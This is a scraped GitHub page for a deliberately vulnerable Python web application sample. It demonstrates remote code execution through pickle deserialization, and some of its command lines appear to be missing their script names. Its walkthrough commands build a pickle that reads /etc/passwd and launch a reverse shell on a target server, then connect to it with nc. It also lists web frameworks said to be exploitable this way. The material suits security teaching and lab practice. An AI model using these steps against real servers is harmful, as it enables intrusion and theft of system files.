Skip to content
Vulnerable Web Application Sample
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


Vulnerable Web Application Sample


Python Web Vuln App

Remote code execution with pickle.

Code execution with pickle.


$ cd python
$ python "cat /etc/passwd" > getpasswd.pickle
$ python -c 'import pickle; pickle.load(open("getpasswd.pickle"))'

Web Framework and pickle

pickleを利用した任意のコード実行とPython Web Framework

$ cd python/bottle
$ python

Launch a reverse shell on target server

$ cd python
$ python http://localhost:8000/ ThisIsSecretKey
$ nc localhost 12345

You got shell!!

You can exploit this vulnerability in the following frameworks

  • Bottle
  • Werkzeug
  • Flask
  • Pylons
  • Pyramid
  • Django
You can’t perform that action at this time.